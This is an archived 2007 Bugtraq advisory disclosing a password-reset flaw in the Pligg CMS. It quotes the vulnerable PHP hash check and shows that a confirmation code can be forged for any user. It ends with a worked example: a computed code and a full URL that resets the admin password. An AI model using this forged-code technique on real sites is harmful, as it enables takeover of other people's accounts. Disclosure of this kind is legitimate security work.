Bugtraq mailing list archives
Pligg critical vulnerability
From: "242th section" <242th.section () gmail com>
Date: Fri, 25 May 2007 15:03:51 +0200
Pligg critical vulnerability Concerned version : 9.5 and ? Description : Pligg is a flexible CMS based on PHP and MYSQL. To reinitialize a forgotten password, Pligg follows a classical process. A confirmation code is generated and sent by email to the concerned user mail box. The user has to follow the link containing the confirmation code and if the confirmation code is checked successfully, the password is reinitialized to a pre-defined value. you can find a part of the source code in charge of this check below : WEB_ROOT/libs/html1.php […] function generateHash($plainText, $salt = null){ if ($salt === null) { $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH); } else { $salt = substr($salt, 0, SALT_LENGTH); } return $salt . sha1($salt . $plainText); } […] WEB_ROOT/login.php : […] $confirmationcode = $_GET["confirmationcode"]; if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH)) == $confirmationcode){ $db->query('UPDATE `' . table_users . '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login` = "'.$username.'"'); […] Unfortunately, as you can read, you can easily generate, for a given username, a confirmation code that passes successfully the following check "if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH)) == $confirmationcode)" Example : Let's choose : salt = 123456789 and, username = admin we have : sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7 and thus : confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7 with the following url you can reinitialize the user admin password : http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7 242th.section.
Current thread:
- Pligg critical vulnerability 242th section (May 25)
- Re: Pligg critical vulnerability crazy frog crazy frog (May 26)